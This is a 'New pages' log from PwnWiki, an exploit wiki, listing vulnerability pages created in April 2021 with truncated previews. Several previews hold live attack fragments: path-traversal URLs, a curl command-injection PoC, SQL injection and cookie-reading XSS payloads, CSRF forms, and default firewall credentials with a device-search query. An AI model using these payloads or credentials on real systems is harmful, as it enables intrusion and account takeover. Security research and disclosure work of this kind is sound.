New pages

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

17:26, 22 April 2021 ‎OTRS 6.0.1 遠程命令執行漏洞 (hist | edit) ‎[4,756 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: OTRS 6.0.1 - Remote Command Execution (2) # Date: 21-04-2021 # Exploit Author: Hex_26 # Vendor Homepage: https://www.otrs.com/ # Software Link:...")
17:25, 22 April 2021 ‎CVE-2021-28935 CMS Made Simple 2.2.15 XSS漏洞 (hist | edit) ‎[838 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) # Date: 2021/03/19 # Exploit Author: bt0 # Vendor Homepage: http://www.cmsmadesimple...")
14:30, 22 April 2021 ‎OpenNetAdmin 18.1.1 遠程命令執行 (hist | edit) ‎[405 bytes] ‎Atsud0 (talk | contribs) (Created page with "== 影響版本： == OpenNetAdmin 18.1.1 == POC： == <pre> cmd=whoami;URL=http://1.1.1.1/www/;curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=toolti...") Tag: Visual edit: Switched
11:02, 22 April 2021 ‎CVE-2021-26415 Windows Installer 特權提升漏洞 (hist | edit) ‎[310 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> @echo off REM Put BaitAndSwitch, example.msi into C:\temp echo > C:\temp\fakelog.txt start C:\temp\BaitAndSwitch C:\temp\linkdir\link C:\temp\fakelog.txt C:\Wind...")
10:14, 22 April 2021 ‎若依任意文件讀取&未授權訪問漏洞 (hist | edit) ‎[208 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==任意文件讀取== <pre> https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd </pre> ==未授權訪問== <pre> http://xxx.xxx.xxx.xxx...")
10:06, 22 April 2021 ‎Hasura GraphQL 1.3.3 SSRF漏洞 (hist | edit) ‎[1,258 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF) # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine...")
10:05, 22 April 2021 ‎Hasura GraphQL 1.3.3 本地文件讀取漏洞 (hist | edit) ‎[825 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Hasura GraphQL 1.3.3 - Local File Read # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine # Version: 1.3.3 # E...")
10:04, 22 April 2021 ‎Hasura GraphQL 1.3.3 拒絕服務漏洞 (hist | edit) ‎[1,656 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine # Version: 1.3.3 #...")
10:02, 22 April 2021 ‎CVE-2021-21425 GravCMS 1.10.7 未經身份驗證任意YAML寫入/更新漏洞 (hist | edit) ‎[5,816 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule...")
10:01, 22 April 2021 ‎CVE-2021-25681 Adtran Personal Phone Manager 10.8.1 DNS數據泄漏漏洞 (hist | edit) ‎[4,492 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration # Date: 1/21/2021 # Exploit Author: 3ndG4me # Vendor Homepage: https://adtran.com/web/pa...")
09:59, 22 April 2021 ‎CVE-2021-25680 Adtran Personal Phone Manager 10.8.1 - 'Multiple' 反射型XSS漏洞 (hist | edit) ‎[6,180 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS) # Date: 1/21/2021 # Exploit Author: 3ndG4me # Vendor Hom...")
09:58, 22 April 2021 ‎CVE-2021-25679 Adtran Personal Phone Manager 10.8.1 - 'emailAddress' 存儲型XSS漏洞 (hist | edit) ‎[4,894 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS) # Date: 1/21/2021 # Exploit Author: 3ndG4me # Vendor Ho...")
09:55, 22 April 2021 ‎OpenEMR 5.0.2.1 遠程命令執行漏洞 (hist | edit) ‎[8,400 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: OpenEMR 5.0.2.1 - Remote Code Execution # Exploit Author: Hato0, BvThTrd # Date: 2020-08-07 # Vendor Homepage: https://www.open-emr.org/ # Softw...")
09:52, 22 April 2021 ‎金山 V8 終端安全系統 pdf maker.php 命令執行漏洞 (hist | edit) ‎[4,890 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== 金山 V8 终端安全系统 ==漏洞復現== V8安裝包： <pre> http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso </pre> 存在漏洞的文件...")
18:08, 21 April 2021 ‎Tenda D151 & D301 未經身份驗證配置文件下載漏洞 (hist | edit) ‎[4,691 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated) # Date: 19-04-2021 # Exploit Author: BenChaliah # Author link: https://github.com/B...")
18:07, 21 April 2021 ‎CVE-2021-30044 RemoteClinic 2 XSS漏洞 (hist | edit) ‎[3,087 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS) # Exploit Author: nu11secur1ty # Debug: g3ck0dr1v3r # Date: 04/21/2021 # Vendor Homepage:...")
18:06, 21 April 2021 ‎CVE-2021-3138 Discourse 2.7.0 2FA繞過漏洞 (hist | edit) ‎[2,296 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass # Date: 14/01/2021 # Exploit Author: Mesh3l_911 # Vendor Homepage: https://www.discourse...")
18:05, 21 April 2021 ‎BlackCat CMS 1.3.6 XSS漏洞 (hist | edit) ‎[837 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 04/07/2021 # Exploit Author: Ömer Hasan Durmuş # Vendor Homepage: ht...")
18:04, 21 April 2021 ‎Fast PHP Chat 1.3 SQL注入漏洞 (hist | edit) ‎[2,139 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection # Date: 15/04/2021 # Exploit Author: Fatih Coskun # Vendor Homepage: https://codecanyon.net/i...")
18:02, 21 April 2021 ‎CVE-2021-31152 Multilaser Router RE018 AC1200 跨站請求偽造漏洞（啟用遠程訪問） (hist | edit) ‎[734 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access) # Date: 14/04/2021 # Exploit Author: Rodolfo Mariano # Versio...")
16:31, 21 April 2021 ‎CVE-2021-3493 linux kernel 特權提升漏洞/zh-cn (hist | edit) ‎[4,297 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==使用教程==")
16:30, 21 April 2021 ‎CVE-2021-3493 linux kernel 特權提升漏洞/es (hist | edit) ‎[4,317 bytes] ‎Pwnwiki (talk | contribs) (Created page with "CVE-2021-3493 Vulnerabilidad de elevación de privilegios del kernel de Linux")
16:29, 21 April 2021 ‎CVE-2021-3493 linux kernel 特權提升漏洞/en (hist | edit) ‎[4,298 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Usage==")
16:25, 21 April 2021 ‎CVE-2021-3493 linux kernel 特權提升漏洞 (hist | edit) ‎[4,404 bytes] ‎Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM Fixed in Linux 5.11 </pre>...")
21:28, 20 April 2021 ‎佑友防火牆後台命令執行漏洞 (hist | edit) ‎[239 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="佑友防火墙" </pre> ==默認帳號密碼== <pre> User: admin Pass: hicomadmin </pre> ==漏洞利用== 登錄後台系統管理 --> 維護工具 --...")
16:06, 20 April 2021 ‎CVE-2021-26295 Apache OFBiz RMI反序列化漏洞/ru (hist | edit) ‎[2,288 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Воздействие уязвимости==")
16:04, 20 April 2021 ‎CVE-2021-3019 Lanproxy 目錄遍歷漏洞/ru (hist | edit) ‎[870 bytes] ‎Pwnwiki (talk | contribs) (Created page with "Отправьте следующий запрос:")
16:02, 20 April 2021 ‎CVE-2021-3378 FortiLogger未經身份驗證文件上傳漏洞/ru (hist | edit) ‎[146 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Затронутая версия==")
15:44, 20 April 2021 ‎Android內核提權漏洞CVE-2019-2215 Binder UAF/ru (hist | edit) ‎[597 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Ссылки==")
15:42, 20 April 2021 ‎CVE-2016-4437 Shiro反序列化漏洞/ru (hist | edit) ‎[806 bytes] ‎Pwnwiki (talk | contribs) (Created page with "Машина-жертва выполняет следующую команду:")
15:37, 20 April 2021 ‎360 Phone N6 Pro內核漏洞/ru (hist | edit) ‎[1,630 bytes] ‎Pwnwiki (talk | contribs) (Created page with "360 Phone N6 Pro уязвимость ядра")
14:18, 20 April 2021 ‎Cute editor For Net 6.4 本地文件包含漏洞 (hist | edit) ‎[111 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://navisec.it/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config </pre>")
14:15, 20 April 2021 ‎CVE-2014-0160 OpenSSL Heartbleed漏洞 (hist | edit) ‎[96 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Tool== https://github.com/drwetter/testssl.sh ==Usage== <pre> ./testssl.sh -H [domain] </pre>")
14:14, 20 April 2021 ‎CVE-2015-4000 SSL/TLS LogJam中間人安全限制繞過漏洞 (hist | edit) ‎[100 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Tool== https://github.com/drwetter/testssl.sh ==Usage== <pre> ./testssl.sh -J <IP ADDRESS> </pre>")
14:13, 20 April 2021 ‎CVE-2015-0204 FREAK SSL/TLS 中間人劫持漏洞 (hist | edit) ‎[100 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Tool== https://github.com/drwetter/testssl.sh ==Usage== <pre> ./testssl.sh -F <IP ADDRESS> </pre>")
14:13, 20 April 2021 ‎CVE-2016-0800 SSLv2 協議漏洞 (hist | edit) ‎[100 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Tool== https://github.com/drwetter/testssl.sh ==Usage== <pre> ./testssl.sh -D <IP ADDRESS> </pre>")
14:09, 20 April 2021 ‎CVE-2016-2183 SSL/TLS協議信息洩露漏洞 (hist | edit) ‎[98 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Tool== https://github.com/drwetter/testssl.sh ==Usage== ./testssl.sh -W <IP ADDRESS>")
14:03, 20 April 2021 ‎Freetextbox 目錄遍歷漏洞 (hist | edit) ‎[113 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://127.0.0.1/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=.. </pre>")
14:02, 20 April 2021 ‎Harbor 任意管理員註冊漏洞 (hist | edit) ‎[1,599 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== Harbor 1.7.0版本至1.8.2版本 ==不受影響版本== Harbor>= 1.7.6 Harbor>= 1.8.3 ==批量利用POC== <pre> import requests import threading import log...")
13:57, 20 April 2021 ‎FreeFTP 1.0.8 'PASS' 遠程緩衝區溢出漏洞 (hist | edit) ‎[2,865 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> # Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow # Date: 2019-09-01 # Author: Chet Manly # Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10...")
13:55, 20 April 2021 ‎Easy File Sharing Web Server 7.2 GET 緩衝區溢出漏洞（SEH） (hist | edit) ‎[1,143 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py...")
13:53, 20 April 2021 ‎Couch through 2.0 路徑洩露漏洞 (hist | edit) ‎[95 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> Location: includes/mysql2i/mysql2i.func.php addons/phpmailer/phpmailer.php </pre>")
13:52, 20 April 2021 ‎Cobub Razor 0.8.0 物理路徑洩露漏洞 (hist | edit) ‎[874 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC1== <pre> URL: http://localhost/export.php HTTP Method: GET URL: http://localhost/index.php?/manage/channel/addchannel HTTP Method: POST Data: channel_name=test"&platform...")
13:51, 20 April 2021 ‎Cobub Razor 0.8.0 SQL注入漏洞 (hist | edit) ‎[343 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://localhost/index.php?/manage/channel/addchannel POST data: 1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(17...")
13:50, 20 April 2021 ‎Cobub Razor 0.7.2 越權增加管理員賬戶漏洞 (hist | edit) ‎[584 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST...")
13:48, 20 April 2021 ‎Cobub Razor 0.7.2 跨站請求偽造漏洞 (hist | edit) ‎[656 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> <body> <script>alert(document.cookie)</script> <form action="http://localhost/index.php?/user/createNewUser/" method="POST"> <input type="hidden" nam...")
13:46, 20 April 2021 ‎Ueditor 1.4.3.3版本CSRF漏洞 (hist | edit) ‎[1,083 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==存在漏洞路徑== <pre> http://localhost:8088/jsp/controller.jsp?action=catchimage&source[]=http://192.168.135.133:8080/test.jpg </pre> ==漏洞利用== 可根據頁面...")
13:44, 20 April 2021 ‎Ueditor編輯器.NET1.4.3.3版本任意文件上傳漏洞 (hist | edit) ‎[360 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> <form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name...")
13:43, 20 April 2021 ‎Ueditor 存儲型XSS漏洞 (hist | edit) ‎[903 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> <html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html> 盲打Cookie、src=""...")
13:41, 20 April 2021 ‎Ueditor 反射型XSS漏洞 (hist | edit) ‎[187 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞位置== <pre> /php/getContent.php /asp/getContent.asp /jsp/getContent.jsp /net/getContent.ashx </pre> ==XSS== POST: <pre> myEditor=<script>alert(document.cookie)</sc...")

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

Anonymous

Search

New pages

Namespaces

More

Page actions

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

New pages

Navigation

Wiki tools

Page tools